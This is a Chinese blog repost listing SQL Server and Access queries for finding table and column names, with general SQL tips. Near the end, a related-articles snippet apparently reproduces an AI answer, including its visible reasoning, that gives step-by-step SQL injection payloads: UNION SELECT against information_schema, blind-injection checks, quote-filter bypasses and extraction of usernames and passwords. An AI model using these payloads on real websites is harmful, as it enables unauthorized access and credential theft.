SQL 查找表名 字段名

最新推荐文章于 2023-03-08 10:09:34 发布
转载 最新推荐文章于 2023-03-08 10:09:34 发布 · 312 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/mrethan/p/4569363.html
文章标签:

#数据库

转载:http://www.accessoft.com/article-show.asp?id=6135

经常碰到一些忘记表名称的情况,此时只记得个大概,此时可通过查询系统表Sysobjects找到所要的表名,如要查找包含用户的表名,可通过以下SQL语句实现,

Select * 
From sysobjects 
Where name like '%user%'

如果知道列名,想查找包含有该列的表名,可加上系统表syscolumns来实现,如想查找列名中包含有user的所有表名,可通过以下SQL语句来实现 
Select * 
From sysobjects s 
Where Exists( 
Select * 
From syscolumns 
Where ID = s.ID and name like '%user%'
)
 

SQL SERVER

查看所有表名:
select    name    from    sysobjects    where    type='U'

查询表的所有字段名:
Select name from syscolumns Where ID=OBJECT_ID('表名')

select * from information_schema.tables
select * from information_schema.views
select * from information_schema.columns

ACCESS

查看所有表名:
select    name    from    MSysObjects    where    type=1    and    flags=0

MSysObjects是系统对象,默认情况是隐藏的。通过工具、选项、视图、显示、系统对象可以使之显示出来。 

1.按姓氏笔画排序: 
Select * From TableName order By CustomerName Collate Chinese_PRC_Stroke_ci_as

2.分页SQL语句 
select * from(select (row_number() OVER (ORDER BY tab.ID Desc)) as rownum,tab.* from 表名 As tab) As t where rownum between 起始位置 And 结束位置

3.获取当前数据库中的所有用户表 
select * from sysobjects where xtype='U' and category=0

4.获取某一个表的所有字段 
select name from syscolumns where id=object_id('表名')

5.查看与某一个表相关的视图、存储过程、函数 
select a.* from sysobjects a, syscomments b where a.id = b.id and b.text like '%表名%'

6.查看当前数据库中所有存储过程 
select name as 存储过程名称 from sysobjects where xtype='P'

7.查询用户创建的所有数据库 
select * from master..sysdatabases D where sid not in(select sid from master..syslogins where name='sa') 
或者 
select dbid, name AS DB_NAME from master..sysdatabases where sid <> 0x01

8.查询某一个表的字段和数据类型 
select column_name,data_type from information_schema.columns 
where table_name = '表名'

9.使用事务 
在使用一些对数据库表的临时的SQL语句操作时,可以采用SQL SERVER事务处理,防止对数据操作后发现误操作问题 
开始事务 
Begin tran 
Insert Into TableName Values(…) 
SQL语句操作不正常,则回滚事务。 
回滚事务 
Rollback tran 
SQL语句操作正常,则提交事务,数据提交至数据库。 
提交事务 
Commit tran 
10. 按全文匹配方式查询 
字段名 LIKE N'%[^a-zA-Z0-9]China[^a-zA-Z0-9]%' 
or 字段名 LIKE N'%[^a-zA-Z0-9]China' 
or 字段名 LIKE N'China[^a-zA-Z0-9]%' 
or 字段名 LIKE N'China

11.计算执行SQL语句查询时间 
declare @d datetime 
set @d=getdate() 
select * from SYS_ColumnProperties select [语句执行花费时间(毫秒)]=datediff(ms,@d,getdate())

12、说明:几个高级查询运算词 
A: UNION 运算符 
UNION 运算符通过组合其他两个结果表(例如 TABLE1 和 TABLE2)并消去表中任何重复行而派生出一个结果表。当 ALL 随 UNION 一起使用时(即 UNION ALL),不消除重复行。两种情况下,派生表的每一行不是来自 TABLE1 就是来自 TABLE2。 
B: EXCEPT 运算符 
EXCEPT 运算符通过包括所有在 TABLE1 中但不在 TABLE2 中的行并消除所有重复行而派生出一个结果表。当 ALL 随 EXCEPT 一起使用时 (EXCEPT ALL),不消除重复行。 
C: INTERSECT 运算符 
INTERSECT 运算符通过只包括 TABLE1 和 TABLE2 中都有的行并消除所有重复行而派生出一个结果表。当 ALL 随 INTERSECT 一起使用时 (INTERSECT ALL),不消除重复行。

转载于:https://www.cnblogs.com/mrethan/p/4569363.html

[MSSQL]SQL 查找表字段名
德仔
09-14 7219
正 文: 经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现,Select * From sysobjects Where name like ‘%user%’如果知道列,想查找包含有该列的,可加上系统syscolumns来实现,如想查找列中包含有user的所有,可通过以下S
使用SQL语句查询MySQL,SQLServer,Oracle所有数据库,字段名
09-09
数据库管理中,有时我们需要获取特定数据库系统的所有数据库以及字段名。这篇文章将详细介绍如何使用SQL语句在MySQLSQL Server和Oracle数据库中进行这样的查询。 首先,我们来看MySQL。MySQL提供了`...
SQL获取所有用户,数据库、所有、所有字段名及字段类型
painss的专栏
07-06 7808
SQL获取所有用户,数据库、所有、所有字段名及字段类型2009-03-14 10:481.获取所有用户:SELECT name FROM Sysusers where status=2 and islogin=1islogin=1示帐户islogin=0示角色status=2示用户帐户status=0示糸统帐户2.获取所有数据库
sql语句查询字段名
seawavecau的专栏
12-14 5586
select name from syscolumns where id in (select id from sysobjects where type = u and name = 相应)  用以上sql语句输入相应就可以查到字段名,对应好数据库 查询是否存在该语句if exists (select * from dbo.sysobjects where id = o
SQL 查找表字段名
xocom的专栏
12-08 1万+
经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现, Select * From sysobjects Where name like '%user%' 如果知道列,想查找包含有该列的,可加上系统syscolumns来实现,如想查找列中包含有user的所有,可通过
SQL查询,的所有字段名
mrx1005的专栏
12-09 854
SQL SERVER 查看所有: select name from sysobjects where type=U 查询的所有字段名: Select name from syscolumns Where ID=OBJECT_ID() select * from information_schema.tables select *
SQL提取数据库字段名等信息代码示例
12-16
SQL中,提取数据库字段名等信息是数据库管理的重要部分,这有助于了解数据库结构,进行数据操作和分析。以下是一些关于如何使用SQL语句获取这些信息的详细说明: 1. **查询所有**: - 在SQL Server中...
在多中查找一个或者字段名SQL 语句
08-05
#### 查找表包含特定字符串的SQL语句 在Oracle数据库中,如果你想找出所有中包含特定字符串的,可以使用以下SQL语句: ```sql SELECT * FROM user_tab_cols WHERE table_name LIKE '%STH%'; ``` 这里的关键...
SQL Server查找表或列中包含空格的和列实例代码
01-19
本文主要给大家介绍的是关于SQL Server查找包含空格的和列的相关内容,为什么会有这篇文章,是因为最近发现一个数据库中的某个有个字段名后面包含了一个空格,这个空格引起了一些小问题,一般出现这种情况,是...
SQL中查询中包含的字段名
热门推荐
CoffeMilk的博客
05-10 2万+
一、SQL SERVER 1、查看所有: select name from sysobjects where type='U' 2、查询的所有字段名: Select name from syscolumns Where ID=OBJECT_ID('') select * from information_schema.tables select * from information_schema.views select * from information_schema.colu
SQL查询包含某个字段的所有
05-02
SQL查询包含某个字段的所有 SQL查询包含某个字段的所有 在查询分析器中选中目标数据库,执行以下语句。
SQl查询数据库的列
weixin_30237719的博客
01-04 208
查询数据库 select * From master.dbo.sysdatabases where name='数据库' and status<>512 --读取库中的所有 (当前数据库)select name from sysobjects where xtype='u' --读取指定的所有列 select name from syscolumns where id...
SQL查询数据库字段名
架构师:通透,才能写出好代码!
03-08 5163
SQL查询数据库字段名
SQL 查找表字段名(转)
东方匠心的专栏
05-23 1万+
正 文: 经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现, Select * From sysobjects Where name like '%user%' 如果知道列,想查找包含有该列的,可加上系统syscolumns来实现,如想查找列中包含有user的所有
sql 查询字段名
weixin_30487201的博客
08-12 126
select b.name from sysobjects a,syscolumns b where a.id=b.id and a.name= 'tableName' 转载于:https://www.cnblogs.com/xinlang/archive/2009/08/12/1544296.html
SQL LIKE语句查询
weixin_30933531的博客
06-24 3661
SQL结构化查询语言中,LIKE语句有着至关重要的作用。 LIKE语句的语法格式是:select * from where 字段名 like 对应值(子串),它主要是针对字符型字段的,它的作用是在一个字符型字段列中检索包含对应子串的。 假设有一个数据库中有个table1,在table1中有两个字段,分别是name和sex二者全是字符型数据。现在我们要在姓字段中查询以“张”字开头的记...
SQL查询,的所有字段名SQL查询,的所有字段名
weixin_30701521的博客
10-22 1585
SQL查询,的所有字段名 2011-07-29 10:21:43|分类: SQLServer |标签:sql字段 |举报 |字号订阅 SQL查询,的所有字段名 SQL SERVER 查看所有: select name from sysobjects where type='U' 查询的所有字段名: ...
sql 获取字段名
weixin_30252709的博客
09-19 3243
有时候需要些插入语句需要写字段名,但由于字段很多所有比较麻烦。用以下的语句就可以直接把所有字段名查出来直接用了 select GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where table_name = 'activity_info'; 合并不同数据库中相同的id 增加100(这个数字根据...
sql注入查找字段名的语句
最新发布
11-15
<think> 嗯,用户的问题是关于SQL注入中查找字段名的语句。我需要结合用户提供的引用内容来回答这个问题。 用户引用了四篇关于SQL注入的材料,其中引用[1]和[2]特别有用。引用[1]提到使用union select联合查询来获取数据库信息,需要猜测字段名。引用[2]具体展示了如何利用已知字段数来获取数据库,使用语句如"1' union select 1, database() #"。 用户的核心问题是如何查找字段名。根据SQL注入的原理,当已经确定字段数后,下一步就是获取字段名。在MySQL中,这可以通过查询information_schema数据库来实现。特别是information_schema.columns存储了所有字段信息。 我考虑设计一个标准的查询语句:在确定字段数后,使用union select结合查询information_schema.columns来获取字段名。例如:假设字段数是3个,可以构造如"1' union select 1, column_name, 3 from information_schema.columns where table_name='users' #"这样的语句。这里table_name参数需要替换为目标。 用户可能还需要知道如何获取,这可以通过查询information_schema.tables来实现。所以我也应该提供获取的示例语句作为补充。 需要注意的是,实际注入时需要根据字段数调整select后的参数个数,并注意显示位置。如果网页只显示部分结果,可能需要使用limit或偏移量来遍历所有结果。 为了更全面,我还应该提醒用户注意数据库版本差异,因为不同数据库的系统可能不同。同时强调这些技术仅用于授权测试,避免法律风险。 最后考虑如何组织回答:先解释原理,再给出具体语句示例,最后补充注意事项。这样既解决了用户问题,又提供了完整的技术背景。 </think> 在SQL注入中获取字段名(列)的核心方法是查询数据库的**元数据**(如MySQL的`information_schema.columns`)。以下是具体步骤和语句: ### 一、核心步骤 1. **确定字段数** 通过`ORDER BY`递增测试,直到页面报错或显示异常: ```sql ' ORDER BY 1-- ' ORDER BY 2-- ... /* 直到出现错误 */ ``` 假设确定字段数为 `3` 2. **获取** 查询目标数据库中的(假设数据库为 `web_db`): ```sql ' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema='web_db'-- ``` 常见目标:`users`, `admin`, `customer` 等。 3. **获取字段名** 关键语句(以 `users` 为例): ```sql ' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_schema='web_db' AND table_name='users'-- ``` - `column_name` 字段会返回目标的所有列(如 `username`, `password`) - 若网页仅显示一个位置,可用 `GROUP_CONCAT(column_name)` 合并结果: ```sql ' UNION SELECT 1, GROUP_CONCAT(column_name), 3 FROM information_schema.columns WHERE table_schema='web_db' AND table_name='users'-- ``` ### 二、其他技巧 1. **盲注场景**(无显错位时) 通过条件判断猜测字段名: ```sql ' AND EXISTS(SELECT * FROM information_schema.columns WHERE table_name='users' AND column_name LIKE 'pass%')-- ``` 2. **利用数据库特性** - **MySQL**: 必须访问 `information_schema` - **SQL Server**: 查询 `sys.columns` - **Oracle**: 查询 `ALL_TAB_COLUMNS` ### 三、防御与注意事项 1. 注入前需明确数据库类型(方法差异大)[^1][^3] 2. 实际注入中需绕过引号过滤(如用十六进制编码 `0x7573657273` 代替 `'users'`) 3. 该技术仅限授权测试,非法使用违法[^3][^4] > **示例攻击链**: > 字段数探测 → 获取数据库获取获取字段名 → 提取数据 > 如:`' UNION SELECT null, username, password FROM users-- `
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值